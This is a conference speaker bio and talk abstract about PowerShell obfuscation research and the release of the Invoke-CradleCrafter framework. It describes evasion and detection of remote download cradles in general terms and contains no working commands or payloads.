Incident Response Consultant
Daniel Bohannon is a Senior Incident Response Consultant at MANDIANT with over six years of operations and information security experience. His particular areas of expertise include enterprise-wide incident response investigations, host-based security monitoring, data aggregation and anomaly detection, and PowerShell-based attack research and detection techniques.
As an incident response consultant, Mr. Bohannon provides emergency services to clients when security breaches occur. He also develops new methods for detecting malicious PowerShell usage at both the host- and network-level while researching obfuscation techniques for PowerShell-based attacks that are being used by numerous threat groups.
Prior to joining MANDIANT, Mr. Bohannon spent five years working in both IT operations and information security roles in the private retail industry. There he developed operational processes for the automated aggregation and detection of host- and network-based anomalies in a large PCI environment. Mr. Bohannon also programmed numerous tools for host-based hunting while leading the organization’s incident response team.
Mr. Bohannon received a Master of Science in Information Security from the Georgia Institute of Technology and a Bachelor of Science in Computer Science from The University of Georgia.
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@(‘Tech’,’niques’) -Join ”)
The very best attackers hide their commands from A/V and application whitelisting technologies using encoded commands and memory-only payloads to evade detection. These techniques thwart Blue Teams from determining what was executed on a target system. However, network defenders are catching on, and state-of-the-art detection tools now monitor the command line arguments for powershell.exe either in real-time or from event logs.
As Red Teamers we need new avenues to remain stealthy in a target environment, and as Blue Teamers we need to stay current in our detection capabilities and defenses. So, this talk will highlight a dozen never-before-seen techniques for obfuscating PowerShell command line arguments and script contents. As an incident responder at Mandiant, I have seen attackers use a handful of these methods to evade basic command line detection mechanisms. I will share these techniques already being used in the wild so you can understand the value each technique provides the attacker. In addition, I will highlight artifacts and techniques that defenders can apply to increase their detection capabilities of PowerShell that leverages these obfuscation techniques.
In the Fall of 2016 I developed and released an obfuscation framework called Invoke-Obfuscation that is built on this research. My aim for this tool has always been to simplify and automate the application of these obfuscation techniques so defenders can use this framework to test their current detection capabilities against obfuscated PowerShell commands and scripts.
However, due to several design decisions to maximize flexibility Invoke-Obfuscation does not contain all of the obfuscation techniques covered in this talk. Many of these techniques highlight obfuscation opportunities stemming from PowerShell’s flexibility as a language and not from pure syntactical obfuscation, encoding and encryption. These techniques focus on the interchangeability of particular PowerShell cmdlets, properties, command ordering and methods of accessing underlying .Net methods, COM objects and additional compiled and scripting languages.
I will conclude this talk by releasing a new obfuscation framework called Invoke-CradleCrafter that will house these new obfuscation techniques. This project serves as a living library of PowerShell remote download cradle “genres” and syntaxes. I will give particular focus to the numerous ways within PowerShell, .Net and native Windows applications that this remote download functionality can be accomplished without using .Net’s popular Net.WebClient class. Invoke-CradleCrafter is designed to highlight the interchangeability of each component of each cradle as well as the pros and cons that each cradle offers from both offensive and defensive perspectives. It consists of obfuscation techniques that are almost entirely different from the techniques found in Invoke-Obfuscation. As such it is my hope that Invoke-CradleCrafter will aid Blue Teams in improving their detection of PowerShell remote download cradles that rely on obscure syntaxes, underlying substitution techniques and additional signed native Windows binaries to perform remote download functionality.